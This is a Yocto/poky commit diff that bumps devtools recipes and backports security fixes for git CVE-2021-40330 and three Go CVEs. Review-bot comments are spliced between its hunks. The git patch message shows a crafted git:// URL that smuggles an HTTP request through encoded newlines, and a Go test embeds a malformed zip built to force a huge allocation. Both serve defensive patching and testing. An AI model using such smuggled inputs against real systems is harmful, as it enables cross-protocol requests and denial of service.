diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb index 2eae9cd892..3bc530e02b 100644 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb +++ b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb @@ -4,12 +4,8 @@ SRC_URI += "file://remove.ldconfig.call.patch \ file://run-ptest \ file://ptest.patch \ file://mkdir_p.patch \ - file://0001-misc-create_inode.c-set-dir-s-mode-correctly.patch \ file://0001-configure.ac-correct-AM_GNU_GETTEXT.patch \ file://0001-intl-do-not-try-to-use-gettext-defines-that-no-longe.patch \ - file://CVE-2019-5188.patch \ - file://0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch \ - file://e2fsck-fix-use-after-free-in-calculate_tree.patch \ " SRC_URI_append_class-native = " file://e2fsprogs-fix-missing-check-for-permission-denied.patch \ @@ -17,7 +13,7 @@ SRC_URI_append_class-native = " file://e2fsprogs-fix-missing-check-for-permissio file://big-inodes-for-small-fs.patch \ " -SRCREV = "984ff8d6a0a1d5dc300505f67b38ed5047d51dac" +SRCREV = "5403970e44241cec26f98aaa0124b9881b4bbf4f" UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>\d+\.\d+(\.\d+)*)$" EXTRA_OECONF += "--libdir=${base_libdir} --sbindir=${base_sbindir} \ diff --git a/poky/meta/recipes-devtools/file/file_5.38.bb b/poky/meta/recipes-devtools/file/file_5.38.bb index 2d62ead10b..b19bf03986 100644 --- a/poky/meta/recipes-devtools/file/file_5.38.bb +++ b/poky/meta/recipes-devtools/file/file_5.38.bb @@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING;beginline=2;md5=0251eaec1188b20d9a72c502ecfdd DEPENDS = "file-replacement-native" DEPENDS_class-native = "bzip2-replacement-native" -SRC_URI = "git://github.com/file/file.git" +SRC_URI = "git://github.com/file/file.git;branch=master;protocol=https" SRCREV = "ec41083645689a787cdd00cb3b5bf578aa79e46c" S = "${WORKDIR}/git" 
diff --git a/poky/meta/recipes-devtools/flex/flex_2.6.4.bb b/poky/meta/recipes-devtools/flex/flex_2.6.4.bb index 1d43d2228a..50d3bf8de1 100644 --- a/poky/meta/recipes-devtools/flex/flex_2.6.4.bb +++ b/poky/meta/recipes-devtools/flex/flex_2.6.4.bb @@ -26,6 +26,11 @@ SRC_URI[sha256sum] = "e87aae032bf07c26f85ac0ed3250998c37621d95f8bd748b31f15b33c4 UPSTREAM_CHECK_URI = "https://github.com/westes/flex/releases" UPSTREAM_CHECK_REGEX = "flex-(?P<pver>\d+(\.\d+)+)\.tar" +# Disputed - yes there is stack exhaustion but no bug and it is building the +# parser, not running it, effectively similar to a compiler ICE. Upstream no plans to address +# https://github.com/westes/flex/issues/414 +CVE_CHECK_WHITELIST += "CVE-2019-6293" + inherit autotools gettext texinfo ptest M4 = "${bindir}/m4" diff --git a/poky/meta/recipes-devtools/gcc/gcc-9.3.inc b/poky/meta/recipes-devtools/gcc/gcc-9.3.inc index 1c8e3df51d..c171f673e9 100644 --- a/poky/meta/recipes-devtools/gcc/gcc-9.3.inc +++ b/poky/meta/recipes-devtools/gcc/gcc-9.3.inc @@ -69,6 +69,7 @@ SRC_URI = "\ file://0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch \ file://0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch \ file://0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch \ + file://0040-fix-missing-dependencies-for-selftests.patch \ file://0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch \ file://0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch \ file://0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch \ @@ -123,3 +124,6 @@ EXTRA_OECONF_PATHS = "\ --with-sysroot=/not/exist \ --with-build-sysroot=${STAGING_DIR_TARGET} \ " + +# Is a binutils 2.26 issue, not gcc +CVE_CHECK_WHITELIST += "CVE-2021-37322" diff --git a/poky/meta/recipes-devtools/gcc/gcc-9.3/0040-fix-missing-dependencies-for-selftests.patch b/poky/meta/recipes-devtools/gcc/gcc-9.3/0040-fix-missing-dependencies-for-selftests.patch new file mode 100644 index 0000000000..c8960c6098 --- /dev/null 
+++ b/poky/meta/recipes-devtools/gcc/gcc-9.3/0040-fix-missing-dependencies-for-selftests.patch @@ -0,0 +1,45 @@ +From b19d8aac15649f31a7588b2634411a1922906ea8 Mon Sep 17 00:00:00 2001 +From: Romain Naour <romain.naour@gmail.com> +Date: Wed, 3 Jun 2020 12:30:57 -0600 +Subject: [PATCH] Fix missing dependencies for selftests which occasionally + causes failed builds. + +gcc/ + + * Makefile.in (SELFTEST_DEPS): Move before including language makefile + fragments. + +Upstream-Status: Backport [https://gcc.gnu.org/git/?p=gcc.git;a=commitdiff;h=b19d8aac15649f31a7588b2634411a1922906ea8] +Signed-off-by:Steve Sakoman <steve@sakoman.com> + +--- + gcc/Makefile.in | 6 ++++-- + 1 file changed, 4 insertions(+), 2 deletions(-) + +diff --git a/gcc/Makefile.in b/gcc/Makefile.in +index aab1dbba57b..be11311b60d 100644 +--- a/gcc/Makefile.in ++++ b/gcc/Makefile.in +@@ -1735,6 +1735,10 @@ $(FULL_DRIVER_NAME): ./xgcc$(exeext) + $(LN_S) $< $@ + + # ++# SELFTEST_DEPS need to be set before including language makefile fragments. ++# Otherwise $(SELFTEST_DEPS) is empty when used from <LANG>/Make-lang.in. ++SELFTEST_DEPS = $(GCC_PASSES) stmp-int-hdrs $(srcdir)/testsuite/selftests ++ + # Language makefile fragments. + + # The following targets define the interface between us and the languages. +@@ -2010,8 +2014,6 @@ DEVNULL=$(if $(findstring mingw,$(build)),nul,/dev/null) + SELFTEST_FLAGS = -nostdinc $(DEVNULL) -S -o $(DEVNULL) \ + -fself-test=$(srcdir)/testsuite/selftests + +-SELFTEST_DEPS = $(GCC_PASSES) stmp-int-hdrs $(srcdir)/testsuite/selftests +- + # Run the selftests during the build once we have a driver and the frontend, + # so that self-test failures are caught as early as possible. + # Use "s-selftest-FE" to ensure that we only run the selftests if the +-- +2.27.0 + diff --git a/poky/meta/recipes-devtools/git/files/CVE-2021-40330.patch b/poky/meta/recipes-devtools/git/files/CVE-2021-40330.patch new file mode 100644 index 0000000000..725f98f0b7 --- /dev/null 
+++ b/poky/meta/recipes-devtools/git/files/CVE-2021-40330.patch 
@@ -0,0 +1,108 @@ +From e77ca0c7d577408878d2b3e8c7336e6119cb3931 Mon Sep 17 00:00:00 2001 +From: Minjae Kim <flowergom@gmail.com> +Date: Thu, 25 Nov 2021 06:36:26 +0000 +Subject: [PATCH] git_connect_git(): forbid newlines in host and path + +When we connect to a git:// server, we send an initial request that +looks something like: + + 002dgit-upload-pack repo.git\0host=example.com + +If the repo path contains a newline, then it's included literally, and +we get: + + 002egit-upload-pack repo + .git\0host=example.com + +This works fine if you really do have a newline in your repository name; +the server side uses the pktline framing to parse the string, not +newlines. However, there are many _other_ protocols in the wild that do +parse on newlines, such as HTTP. So a carefully constructed git:// URL +can actually turn into a valid HTTP request. For example: + + git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 %0d%0aHost:localhost%0d%0a%0d%0a + +becomes: + + 0050git-upload-pack / + GET / HTTP/1.1 + Host:localhost + + host=localhost:1234 + +on the wire. Again, this isn't a problem for a real Git server, but it +does mean that feeding a malicious URL to Git (e.g., through a +submodule) can cause it to make unexpected cross-protocol requests. +Since repository names with newlines are presumably quite rare (and +indeed, we already disallow them in git-over-http), let's just disallow +them over this protocol. + +Hostnames could likewise inject a newline, but this is unlikely a +problem in practice; we'd try resolving the hostname with a newline in +it, which wouldn't work. Still, it doesn't hurt to err on the side of +caution there, since we would not expect them to work in the first +place. + +The ssh and local code paths are unaffected by this patch. In both cases +we're trying to run upload-pack via a shell, and will quote the newline +so that it makes it intact. 
An attacker can point an ssh url at an +arbitrary port, of course, but unless there's an actual ssh server +there, we'd never get as far as sending our shell command anyway. We +_could_ similarly restrict newlines in those protocols out of caution, +but there seems little benefit to doing so. + +The new test here is run alongside the git-daemon tests, which cover the +same protocol, but it shouldn't actually contact the daemon at all. In +theory we could make the test more robust by setting up an actual +repository with a newline in it (so that our clone would succeed if our +new check didn't kick in). But a repo directory with newline in it is +likely not portable across all filesystems. Likewise, we could check +git-daemon's log that it was not contacted at all, but we do not +currently record the log (and anyway, it would make the test racy with +the daemon's log write). We'll just check the client-side stderr to make +sure we hit the expected code path. + +Reported-by: Harold Kim <h.kim@flatt.tech> +Signed-off-by: Jeff King <peff@peff.net> +Signed-off-by: Junio C Hamano <gitster@pobox.com> + +Upstream-Status: Backported [https://github.com/git/git/commit/a02ea577174ab8ed18f847cf1693f213e0b9c473] +CVE: CVE-2021-40330 +Signed-off-by: Minjae Kim <flowergom@gmail.com> +--- + connect.c | 2 ++ + t/t5570-git-daemon.sh | 5 +++++ + 2 files changed, 7 insertions(+) + +diff --git a/connect.c b/connect.c +index b6451ab..929de9a 100644 +--- a/connect.c ++++ b/connect.c +@@ -1064,6 +1064,8 @@ static struct child_process *git_connect_git(int fd[2], char *hostandport, + target_host = xstrdup(hostandport); + + transport_check_allowed("git"); ++ if (strchr(target_host, '\n') || strchr(path, '\n')) ++ die(_("newline is forbidden in git:// hosts and repo paths")); + + /* + * These underlying connection commands die() if they +diff --git a/t/t5570-git-daemon.sh b/t/t5570-git-daemon.sh +index 34487bb..79cd218 100755 +--- a/t/t5570-git-daemon.sh ++++ b/t/t5570-git-daemon.sh +@@ 
-103,6 +103,11 @@ test_expect_success 'fetch notices corrupt idx' ' + ) + ' + ++test_expect_success 'client refuses to ask for repo with newline' ' ++ test_must_fail git clone "$GIT_DAEMON_URL/repo$LF.git" dst 2>stderr && ++ test_i18ngrep newline.is.forbidden stderr ++' ++ + test_remote_error() + { + do_export=YesPlease +-- +2.17.1 + diff --git a/poky/meta/recipes-devtools/git/git.inc b/poky/meta/recipes-devtools/git/git.inc index 738a429875..a89dd42e8b 100644 --- a/poky/meta/recipes-devtools/git/git.inc +++ b/poky/meta/recipes-devtools/git/git.inc @@ -10,7 +10,9 @@ PROVIDES_append_class-native = " git-replacement-native" SRC_URI = "${KERNELORG_MIRROR}/software/scm/git/git-${PV}.tar.gz;name=tarball \ ${KERNELORG_MIRROR}/software/scm/git/git-manpages-${PV}.tar.gz;name=manpages \ file://CVE-2021-21300.patch \ -" + file://fixsort.patch \ + file://CVE-2021-40330.patch \ + " S = "${WORKDIR}/git-${PV}" diff --git a/poky/meta/recipes-devtools/git/git/fixsort.patch b/poky/meta/recipes-devtools/git/git/fixsort.patch new file mode 100644 index 0000000000..eec1f84945 --- /dev/null +++ b/poky/meta/recipes-devtools/git/git/fixsort.patch 
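Review bot: The header of CVE-2021-40330.patch spells its status tag `Upstream-Status: Backported [...]`, while every other patch added in this commit uses the keyword `Backport`. Tooling that matches the status keyword may not recognise this spelling (not verifiable from this page). The line should read `Upstream-Status: Backport [https://github.com/git/git/commit/a02ea577174ab8ed18f847cf1693f213e0b9c473]`. The `From:` line also names the backporter rather than the upstream author, so the origin of this security fix is only recoverable from the Signed-off-by trailers and the URL.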
@@ -0,0 +1,36 @@ +[PATCH] generate-cmdlist.sh: Fix determinism issue + +Currently git binaries are not entirely reproducible, at least partly +due to config-list.h differing in order depending on the system's +locale settings. Under different locales, the entries: + +"sendemail.identity", +"sendemail.<identity>.*", + +would differ in order for example and this leads to differences in +the debug symbols for the binaries. + +This can be fixed by specifying the C locale for the sort in the +shell script generating the header. + +Note: This is a backport of Richard Purdie's original patch for a more +recent version of git. The offending code in this older version is +in generate-cmdlist.sh. The upstream current version has this code +in generate-configlist.sh. + +Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org> +Signed-off-by: Steve Sakoman <steve@sakoman.com> +Upstream-Status: Submitted [https://public-inbox.org/git/f029a942dd3d50d85e60bd37d8e454524987842f.camel@linuxfoundation.org/T/#u] + +index 71158f7..c137091 100755 +--- a/generate-cmdlist.sh ++++ b/generate-cmdlist.sh +@@ -82,7 +82,7 @@ static const char *config_name_list[] = { + EOF + grep -h '^[a-zA-Z].*\..*::$' Documentation/*config.txt Documentation/config/*.txt | + sed '/deprecated/d; s/::$//; s/, */\n/g' | +- sort | ++ LC_ALL=C sort | + while read line + do + echo " \"$line\"," diff --git a/poky/meta/recipes-devtools/glide/glide_0.13.3.bb b/poky/meta/recipes-devtools/glide/glide_0.13.3.bb index 6eb87df7c3..21773d91f9 100644 --- a/poky/meta/recipes-devtools/glide/glide_0.13.3.bb +++ b/poky/meta/recipes-devtools/glide/glide_0.13.3.bb @@ -5,7 +5,7 @@ LICENSE = "MIT" LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=54905cf894f8cc416a92f4fc350c35b2" GO_IMPORT = "github.com/Masterminds/glide" -SRC_URI = "git://${GO_IMPORT}" +SRC_URI = "git://${GO_IMPORT};branch=master" SRCREV = "8ed5b9292379d86c39592a7e6a58eb9c903877cf" inherit go 
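Review bot: The new `SRC_URI = "git://${GO_IMPORT};branch=master"` in glide_0.13.3.bb pins the branch but leaves the transport at the fetcher default, whereas the file_5.38.bb and libcomps_0.1.15.bb hunks in this same commit add `;protocol=https` for their github.com sources. GO_IMPORT here is `github.com/Masterminds/glide`, so the source would presumably still be requested over plain git://, which has no transport authentication or encryption. The pinned SRCREV limits what a tampered fetch could deliver, but the recipe should not depend on that alone. The go-dep_0.5.4.bb hunk further down has the same gap. Suggested: `SRC_URI = "git://${GO_IMPORT};branch=master;protocol=https"`.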
diff --git a/poky/meta/recipes-devtools/gnu-config/gnu-config_git.bb b/poky/meta/recipes-devtools/gnu-config/gnu-config_git.bb index 7299a1d4a4..df8947e425 100644 --- a/poky/meta/recipes-devtools/gnu-config/gnu-config_git.bb +++ b/poky/meta/recipes-devtools/gnu-config/gnu-config_git.bb @@ -12,7 +12,7 @@ INHIBIT_DEFAULT_DEPS = "1" SRCREV = "5256817ace8493502ec88501a19e4051c2e220b0" PV = "20200117+git${SRCPV}" -SRC_URI = "git://git.savannah.gnu.org/config.git \ +SRC_URI = "git://git.savannah.gnu.org/config.git;branch=master \ file://gnu-configize.in" S = "${WORKDIR}/git" UPSTREAM_CHECK_COMMITS = "1" diff --git a/poky/meta/recipes-devtools/go/go-1.14.inc b/poky/meta/recipes-devtools/go/go-1.14.inc index 3dfd671d11..abc6f42184 100644 --- a/poky/meta/recipes-devtools/go/go-1.14.inc +++ b/poky/meta/recipes-devtools/go/go-1.14.inc @@ -16,6 +16,15 @@ SRC_URI += "\ file://0006-cmd-dist-separate-host-and-target-builds.patch \ file://0007-cmd-go-make-GOROOT-precious-by-default.patch \ file://0008-use-GOBUILDMODE-to-set-buildmode.patch \ + file://CVE-2021-34558.patch \ + file://CVE-2021-33196.patch \ + file://CVE-2021-33197.patch \ " SRC_URI_append_libc-musl = " file://0009-ld-replace-glibc-dynamic-linker-with-musl.patch" SRC_URI[main.sha256sum] = "7ed13b2209e54a451835997f78035530b331c5b6943cdcd68a3d815fdc009149" + +# Upstream don't believe it is a signifiant real world issue and will only +# fix in 1.17 onwards where we can drop this. +# https://github.com/golang/go/issues/30999#issuecomment-910470358 +CVE_CHECK_WHITELIST += "CVE-2021-29923" + diff --git a/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch b/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch new file mode 100644 index 0000000000..2e2dc62c49 --- /dev/null +++ b/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch 
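Review bot: The `CVE_CHECK_WHITELIST += "CVE-2021-29923"` entry in go-1.14.inc silences the CVE checker for an issue that, by the comment's own wording, is only fixed from 1.17 onwards, so the go 1.14 built by this recipe stays affected. The flex and gcc whitelist entries in this commit are justified as disputed or as belonging to another component; this one is an accepted risk, and the comment should say so plainly so that a reader of the scan output does not take it for not-applicable. Suggested wording: `# Not fixed in 1.14: upstream only fixes this from 1.17 onwards and rates it low impact; drop on upgrade.`, which also removes the `signifiant` typo.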
@@ -0,0 +1,124 @@ +From 74242baa4136c7a9132a8ccd9881354442788c8c Mon Sep 17 00:00:00 2001 +From: Roland Shoemaker <roland@golang.org> +Date: Tue, 11 May 2021 11:31:31 -0700 +Subject: [PATCH] archive/zip: only preallocate File slice if reasonably sized + +Since the number of files in the EOCD record isn't validated, it isn't +safe to preallocate Reader.Files using that field. A malformed archive +can indicate it contains up to 1 << 128 - 1 files. We can still safely +preallocate the slice by checking if the specified number of files in +the archive is reasonable, given the size of the archive. + +Thanks to the OSS-Fuzz project for discovering this issue and to +Emmanuel Odeke for reporting it. + +Fixes #46242 +Fixes CVE-2021-33196 + +Change-Id: I3c76d8eec178468b380d87fdb4a3f2cb06f0ee76 +Reviewed-on: https://go-review.googlesource.com/c/go/+/318909 +Trust: Roland Shoemaker <roland@golang.org> +Trust: Katie Hockman <katie@golang.org> +Trust: Joe Tsai <thebrokentoaster@gmail.com> +Run-TryBot: Roland Shoemaker <roland@golang.org> +TryBot-Result: Go Bot <gobot@golang.org> +Reviewed-by: Katie Hockman <katie@golang.org> +Reviewed-by: Joe Tsai <thebrokentoaster@gmail.com> + +Upstream-Status: Backport +CVE: CVE-2021-33196 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + src/archive/zip/reader.go | 10 +++++- + src/archive/zip/reader_test.go | 59 ++++++++++++++++++++++++++++++++++ + 2 files changed, 68 insertions(+), 1 deletion(-) + +Index: go/src/archive/zip/reader.go +=================================================================== +--- go.orig/src/archive/zip/reader.go ++++ go/src/archive/zip/reader.go +@@ -84,7 +84,15 @@ func (z *Reader) init(r io.ReaderAt, siz + return err + } + z.r = r +- z.File = make([]*File, 0, end.directoryRecords) ++ // Since the number of directory records is not validated, it is not ++ // safe to preallocate z.File without first checking that the specified ++ // number of files is reasonable, since a malformed archive may ++ // 
indicate it contains up to 1 << 128 - 1 files. Since each file has a ++ // header which will be _at least_ 30 bytes we can safely preallocate ++ // if (data size / 30) >= end.directoryRecords. ++ if (uint64(size)-end.directorySize)/30 >= end.directoryRecords { ++ z.File = make([]*File, 0, end.directoryRecords) ++ } + z.Comment = end.comment + rs := io.NewSectionReader(r, 0, size) + if _, err = rs.Seek(int64(end.directoryOffset), io.SeekStart); err != nil { +Index: go/src/archive/zip/reader_test.go +=================================================================== +--- go.orig/src/archive/zip/reader_test.go ++++ go/src/archive/zip/reader_test.go +@@ -1070,3 +1070,62 @@ func TestIssue12449(t *testing.T) { + t.Errorf("Error reading the archive: %v", err) + } + } ++ ++func TestCVE202133196(t *testing.T) { ++ // Archive that indicates it has 1 << 128 -1 files, ++ // this would previously cause a panic due to attempting ++ // to allocate a slice with 1 << 128 -1 elements. ++ data := []byte{ ++ 0x50, 0x4b, 0x03, 0x04, 0x14, 0x00, 0x08, 0x08, ++ 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x01, 0x02, ++ 0x03, 0x62, 0x61, 0x65, 0x03, 0x04, 0x00, 0x00, ++ 0xff, 0xff, 0x50, 0x4b, 0x07, 0x08, 0xbe, 0x20, ++ 0x5c, 0x6c, 0x09, 0x00, 0x00, 0x00, 0x03, 0x00, ++ 0x00, 0x00, 0x50, 0x4b, 0x01, 0x02, 0x14, 0x00, ++ 0x14, 0x00, 0x08, 0x08, 0x08, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0xbe, 0x20, 0x5c, 0x6c, 0x09, 0x00, ++ 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, ++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x01, 0x02, 0x03, 0x50, 0x4b, 0x06, 0x06, 0x2c, ++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d, ++ 0x00, 0x2d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff, ++ 0xff, 0xff, 0xff, 0x31, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x3a, 
0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x50, 0x4b, 0x06, 0x07, 0x00, ++ 0x00, 0x00, 0x00, 0x6b, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x50, ++ 0x4b, 0x05, 0x06, 0x00, 0x00, 0x00, 0x00, 0xff, ++ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, ++ 0xff, 0xff, 0xff, 0x00, 0x00, ++ } ++ _, err := NewReader(bytes.NewReader(data), int64(len(data))) ++ if err != ErrFormat { ++ t.Fatalf("unexpected error, got: %v, want: %v", err, ErrFormat) ++ } ++ ++ // Also check that an archive containing a handful of empty ++ // files doesn't cause an issue ++ b := bytes.NewBuffer(nil) ++ w := NewWriter(b) ++ for i := 0; i < 5; i++ { ++ _, err := w.Create("") ++ if err != nil { ++ t.Fatalf("Writer.Create failed: %s", err) ++ } ++ } ++ if err := w.Close(); err != nil { ++ t.Fatalf("Writer.Close failed: %s", err) ++ } ++ r, err := NewReader(bytes.NewReader(b.Bytes()), int64(b.Len())) ++ if err != nil { ++ t.Fatalf("NewReader failed: %s", err) ++ } ++ if len(r.File) != 5 { ++ t.Errorf("Archive has unexpected number of files, got %d, want 5", len(r.File)) ++ } ++} diff --git a/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch b/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch new file mode 100644 index 0000000000..2052b1d3db --- /dev/null +++ b/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch 
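Review bot: The new guard `(uint64(size)-end.directorySize)/30 >= end.directoryRecords` in `Reader.init` subtracts two unsigned values without first checking that `end.directorySize` is not larger than `size`. `directorySize` appears to come from the same end-of-central-directory record that the added comment describes as unvalidated, so an archive declaring an oversized directory wraps the subtraction to a very large number, the comparison passes, and `make` is again called with the record count taken from the file. Checking the size first closes that path: `if end.directorySize < uint64(size) && (uint64(size)-end.directorySize)/30 >= end.directoryRecords {`. The added test covers only the huge-record-count case; a second case with `directorySize` larger than the archive would pin this. The body of `init` continues outside the hunk.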
@@ -0,0 +1,152 @@ +From cbd1ca84453fecf3825a6bb9f985823e8bc32b76 Mon Sep 17 00:00:00 2001 +From: Filippo Valsorda <filippo@golang.org> +Date: Fri, 21 May 2021 14:02:30 -0400 +Subject: [PATCH] [release-branch.go1.15] net/http/httputil: always remove + hop-by-hop headers + +Previously, we'd fail to remove the Connection header from a request +like this: + + Connection: + Connection: x-header + +Updates #46313 +Fixes #46314 +Fixes CVE-2021-33197 + +Change-Id: Ie3009e926ceecfa86dfa6bcc6fe14ff01086be7d +Reviewed-on: https://go-review.googlesource.com/c/go/+/321929 +Run-TryBot: Filippo Valsorda <filippo@golang.org> +Reviewed-by: Katie Hockman <katie@golang.org> +Trust: Katie Hockman <katie@golang.org> +Trust: Filippo Valsorda <filippo@golang.org> +TryBot-Result: Go Bot <gobot@golang.org> +Reviewed-on: https://go-review.googlesource.com/c/go/+/323091 +Run-TryBot: Katie Hockman <katie@golang.org> + +Upstream-Status: Backport +CVE: CVE-2021-33197 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + src/net/http/httputil/reverseproxy.go | 22 ++++---- + src/net/http/httputil/reverseproxy_test.go | 63 +++++++++++++++++++++- + 2 files changed, 70 insertions(+), 15 deletions(-) + +Index: go/src/net/http/httputil/reverseproxy.go +=================================================================== +--- go.orig/src/net/http/httputil/reverseproxy.go ++++ go/src/net/http/httputil/reverseproxy.go +@@ -221,22 +221,18 @@ func (p *ReverseProxy) ServeHTTP(rw http + // important is "Connection" because we want a persistent + // connection, regardless of what the client sent to us. + for _, h := range hopHeaders { +- hv := outreq.Header.Get(h) +- if hv == "" { +- continue +- } +- if h == "Te" && hv == "trailers" { +- // Issue 21096: tell backend applications that +- // care about trailer support that we support +- // trailers. 
(We do, but we don't go out of +- // our way to advertise that unless the +- // incoming client request thought it was +- // worth mentioning) +- continue +- } + outreq.Header.Del(h) + } + ++ // Issue 21096: tell backend applications that care about trailer support ++ // that we support trailers. (We do, but we don't go out of our way to ++ // advertise that unless the incoming client request thought it was worth ++ // mentioning.) Note that we look at req.Header, not outreq.Header, since ++ // the latter has passed through removeConnectionHeaders. ++ if httpguts.HeaderValuesContainsToken(req.Header["Te"], "trailers") { ++ outreq.Header.Set("Te", "trailers") ++ } ++ + // After stripping all the hop-by-hop connection headers above, add back any + // necessary for protocol upgrades, such as for websockets. + if reqUpType != "" { +Index: go/src/net/http/httputil/reverseproxy_test.go +=================================================================== +--- go.orig/src/net/http/httputil/reverseproxy_test.go ++++ go/src/net/http/httputil/reverseproxy_test.go +@@ -91,8 +91,9 @@ func TestReverseProxy(t *testing.T) { + + getReq, _ := http.NewRequest("GET", frontend.URL, nil) + getReq.Host = "some-name" +- getReq.Header.Set("Connection", "close") +- getReq.Header.Set("Te", "trailers") ++ getReq.Header.Set("Connection", "close, TE") ++ getReq.Header.Add("Te", "foo") ++ getReq.Header.Add("Te", "bar, trailers") + getReq.Header.Set("Proxy-Connection", "should be deleted") + getReq.Header.Set("Upgrade", "foo") + getReq.Close = true +@@ -236,6 +237,64 @@ func TestReverseProxyStripHeadersPresent + } + } + ++func TestReverseProxyStripEmptyConnection(t *testing.T) { ++ // See Issue 46313. ++ const backendResponse = "I am the backend" ++ ++ // someConnHeader is some arbitrary header to be declared as a hop-by-hop header ++ // in the Request's Connection header. 
++ const someConnHeader = "X-Some-Conn-Header" ++ ++ backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { ++ if c := r.Header.Values("Connection"); len(c) != 0 { ++ t.Errorf("handler got header %q = %v; want empty", "Connection", c) ++ } ++ if c := r.Header.Get(someConnHeader); c != "" { ++ t.Errorf("handler got header %q = %q; want empty", someConnHeader, c) ++ } ++ w.Header().Add("Connection", "") ++ w.Header().Add("Connection", someConnHeader) ++ w.Header().Set(someConnHeader, "should be deleted") ++ io.WriteString(w, backendResponse) ++ })) ++ defer backend.Close() ++ backendURL, err := url.Parse(backend.URL) ++ if err != nil { ++ t.Fatal(err) ++ } ++ proxyHandler := NewSingleHostReverseProxy(backendURL) ++ frontend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { ++ proxyHandler.ServeHTTP(w, r) ++ if c := r.Header.Get(someConnHeader); c != "should be deleted" { ++ t.Errorf("handler modified header %q = %q; want %q", someConnHeader, c, "should be deleted") ++ } ++ })) ++ defer frontend.Close() ++ ++ getReq, _ := http.NewRequest("GET", frontend.URL, nil) ++ getReq.Header.Add("Connection", "") ++ getReq.Header.Add("Connection", someConnHeader) ++ getReq.Header.Set(someConnHeader, "should be deleted") ++ res, err := frontend.Client().Do(getReq) ++ if err != nil { ++ t.Fatalf("Get: %v", err) ++ } ++ defer res.Body.Close() ++ bodyBytes, err := ioutil.ReadAll(res.Body) ++ if err != nil { ++ t.Fatalf("reading body: %v", err) ++ } ++ if got, want := string(bodyBytes), backendResponse; got != want { ++ t.Errorf("got body %q; want %q", got, want) ++ } ++ if c := res.Header.Get("Connection"); c != "" { ++ t.Errorf("handler got header %q = %q; want empty", "Connection", c) ++ } ++ if c := res.Header.Get(someConnHeader); c != "" { ++ t.Errorf("handler got header %q = %q; want empty", someConnHeader, c) ++ } ++} ++ + func TestXForwardedFor(t *testing.T) { + const prevForwardedFor = "client ip" + 
const backendResponse = "I am the backend" diff --git a/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch b/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch new file mode 100644 index 0000000000..8fb346d622 --- /dev/null +++ b/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch 
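Review bot: The header of CVE-2021-33197.patch gives `Upstream-Status: Backport` with no reference, and its subject is tagged `[release-branch.go1.15]` although the patch is applied to go-1.14, so nothing in the file records which upstream commit was adapted or whether it needed changes. CVE-2021-33196.patch carries the same bare tag, while CVE-2021-34558.patch in this commit does list its upstream commit URL. Suggested: `Upstream-Status: Backport [https://github.com/golang/go/commit/cbd1ca84453fecf3825a6bb9f985823e8bc32b76]`, assuming the hash on the patch's `From` line is the upstream commit.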
@@ -0,0 +1,51 @@
+From a98589711da5e9d935e8d690cfca92892e86d557 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Wed, 9 Jun 2021 11:31:27 -0700
+Subject: [PATCH] crypto/tls: test key type when casting
+
+When casting the certificate public key in generateClientKeyExchange,
+check the type is appropriate. This prevents a panic when a server
+agrees to a RSA based key exchange, but then sends an ECDSA (or
+other) certificate.
+
+Fixes #47143
+Fixes CVE-2021-34558
+
+Thanks to Imre Rad for reporting this issue.
+
+Change-Id: Iabccacca6052769a605cccefa1216a9f7b7f6aea
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1116723
+Reviewed-by: Filippo Valsorda <valsorda@google.com>
+Reviewed-by: Katie Hockman <katiehockman@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/334031
+Trust: Filippo Valsorda <filippo@golang.org>
